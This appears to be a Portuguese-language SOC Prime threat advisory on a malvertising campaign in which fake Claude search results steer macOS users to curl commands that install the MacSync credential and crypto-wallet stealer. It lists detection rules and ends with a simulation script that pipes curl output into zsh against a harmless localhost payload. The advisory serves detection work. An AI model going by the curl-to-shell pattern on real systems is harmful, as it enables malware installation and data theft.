SOC Prime Bias: High

20 Aug 2026 07:28 UTC

Resultados falsos de busca por Claude levam usuários de macOS ao MacSync Stealer

Author Photo
SOC Prime Team linkedin icon Seguir
Resultados falsos de busca por Claude levam usuários de macOS ao MacSync Stealer
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Os atores de ameaça estão abusando de malvertising nos resultados de busca do Google para redirecionar usuários a conversas compartilhadas legítimas no Claude.ai contendo instruções para executar maliciosos curl comandos. A cadeia de ataque entrega o MacSync, um avançado ladrão de macOS e RAT projetado para exfiltrar credenciais, segredos do Keychain e dados de carteiras de criptomoedas. O malware segue uma cadeia de ataque complexa de seis estágios envolvendo execução na memória e abuso de permissões TCC.

Investigação

Analistas da Huntress investigaram a campanha de malvertising após um cliente ter sido comprometido por meio de um guia de instalação fraudulento do Claude. Os pesquisadores contornaram as proteções dos atacantes e recuperaram uma amostra de malware diretamente da infraestrutura do adversário. A investigação descobriu uma cadeia de execução em múltiplos estágios envolvendo um zsh carregador, roubo de dados baseado em AppleScript e um RAT Mach-O usado para estabelecer persistência.

Mitigação

Os usuários devem evitar copiar e executar comandos não verificados no Terminal, mesmo quando as instruções aparecem em domínios legítimos ou confiáveis. As equipes de segurança devem monitorar atividades suspeitas curl e conteúdo codificado em Base64 dentro de processos de shell. Ferramentas como BlockBlock e LuLu também podem ajudar a detectar mecanismos de persistência no macOS e conexões de rede não autorizadas para fora.

Resposta

Se atividade do MacSync for detectada, o dispositivo macOS afetado deve ser isolado imediatamente para interromper mais exfiltração de dados. Os investigadores devem revisar o histórico do shell e a telemetria do endpoint para execuções não autorizadas. curl or zsh Mudanças nas permissões TCC também devem ser examinadas, junto com LaunchAgents não autorizados e binários de aplicativos modificados, sobretudo aqueles associados a carteiras de criptomoedas.

Fluxo de Ataque

Detecções

Tentativa de Execução de Curl Suspeita [MacOS] (via cmdline)

Equipe SOC Prime
19 Ago 2026

Arquivo Foi Criado na Pasta Temporária do MacOS (via file_event)

Equipe SOC Prime
19 Ago 2026

IOCs (SourceIP) para detectar: Como uma Busca no Google por Claude Levou ao MacSync

Regras de IA da SOC Prime
19 Ago 2026

IOCs (DestinationIP) para detectar: Como uma Busca no Google por Claude Levou ao MacSync

Regras de IA da SOC Prime
19 Ago 2026

Resultado de Busca Malicioso Leva ao MacSync Infostealer [Servidor Web]

Regras de IA da SOC Prime
19 Ago 2026

Conexão de Comando e Controle de RAT Mach-O via WebSockets [Conexão de Rede Windows]

Regras de IA da SOC Prime
19 Ago 2026

Detecção da Campanha de Malvertising MacSync Usando Curl com Carregador Zsh [Criação de Processo Linux]

Regras de IA da SOC Prime
19 Ago 2026

Execução de Simulação

Pré-requisito: A Verificação Pré-executória Telemetria & Baseline deve ter sido aprovada.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão ao mau diagnóstico.

  • Narrativa de Ataque & Comandos: O adversário mira o usuário por meio de uma atualização de software falsa (malvertising). Uma vez que o usuário executa o comando fornecido no terminal, curl busca um script malicioso. Este script é imediatamente canalizado em zsh. O script contém uma string específica daemon_function que é usada para esconder processos de fundo maliciosos. A regra de detecção está especificamente procurando a combinação de curl, zsh, e o daemon_function string na linha de comando para identificar esta campanha específica.

  • Script de Teste de Regressão:

    #!/bin/bash
    # Script de simulação para validação de detecção de MacSync Malvertising.
    # Isso simula um usuário executando um one-liner que busca e executa um script.
    
    echo "[+] Iniciando Simulação de MacSync..."
    
    # Simulamos o comando criando um script "malicioso" local 
    # e então executando exatamente o padrão de linha de comando que a regra procura.
    
    echo "function daemon_function() { echo 'Exfiltrando dados...'; }; daemon_function" > /tmp/fake_payload.sh
    chmod +x /tmp/fake_payload.sh
    
    # Este é o padrão exato: curl + zsh + daemon_function
    # Usamos um subshell para simular o comportamento de piping
    echo "[+] Executando linha de comando maliciosa..."
    curl -s http://localhost/fake_payload.sh | zsh -s daemon_function
    
    echo "[+] Comando de simulação executado."
  • Comandos de Limpeza:

    # Remove o payload simulado e arquivos temporários.
    rm /tmp/fake_payload.sh
    echo "[+] Limpeza completa."